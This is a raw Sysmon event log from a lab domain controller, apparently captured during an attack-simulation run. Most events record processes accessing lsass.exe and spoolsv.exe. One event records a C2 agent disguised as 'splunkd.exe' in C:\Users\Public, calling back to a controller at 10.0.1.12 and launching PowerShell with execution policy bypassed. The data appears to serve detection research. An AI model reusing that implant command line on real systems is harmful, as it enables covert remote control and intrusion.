12:01:01.049{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.049{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.049{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.049{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.049{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.049{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.049{266CAFBE-646A-6064-0B00-00000000AE01}856100C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.049{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.033{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647D-6064-2E00-00000000AE01}3028C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.033{266CAFBE-646A-6064-0A00-00000000AE01}840920C:\Windows\system32\services.exe{266CAFBE-647D-6064-2E00-00000000AE01}3028C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.031{266CAFBE-647D-6064-2E00-00000000AE01}3028C:\Program Files\Amazon\XenTools\LiteAgent.exe1.0xenagentXENIFACEAmazon Inc.xenagent.exe"C:\Program Files\Amazon\XenTools\LiteAgent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.022{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.022{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.005{266CAFBE-6473-6064-2600-00000000AE01}30602196C:\Windows\system32\conhost.exe{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.002{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.002{266CAFBE-6473-6064-2500-00000000AE01}30522412C:\Users\Public\splunkd.exe{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Users\Public\splunkd.exe+5c36e 154100x80000000000000001608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.998{266CAFBE-647C-6064-2C00-00000000AE01}2916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -ExecutionPolicy Bypass -C wtpdjlC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6473-6064-2500-00000000AE01}3052C:\Users\Public\splunkd.exe"C:\Users\Public\splunkd.exe" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp 17141700x80000000000000001607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:01.000{266CAFBE-647C-6064-2B00-00000000AE01}2536\Winsock2\CatalogChangeListener-9e8-0C:\Windows\System32\spoolsv.exe 10341000x80000000000000001606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.996{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.996{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.988{266CAFBE-646A-6064-0A00-00000000AE01}840900C:\Windows\system32\services.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.976{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.975{266CAFBE-646A-6064-0A00-00000000AE01}8401092C:\Windows\system32\services.exe{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.960{266CAFBE-647C-6064-2B00-00000000AE01}2536C:\Windows\System32\spoolsv.exe10.0.14393.4169 (rs1_release.210107-1130)Spooler SubSystem AppMicrosoft® Windows® Operating SystemMicrosoft Corporationspoolsv.exeC:\Windows\System32\spoolsv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=87E844BD124333302C9DCF947D98B3A3,SHA256=4C3316B6F7671B2E859B2BC98702C7973FB9BC7A6EA71EDB6ACDFE2CF23EB7A0,IMPHASH=A40033EBEE6E37CE4B1D96B817E1BCC7{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.955{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.955{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.955{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.954{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 534500x80000000000000001596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.936{266CAFBE-6476-6064-2800-00000000AE01}2556C:\Users\Public\sandcat.exe 10341000x80000000000000001595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:00.299{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2380C:\Windows\system32\wermgr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 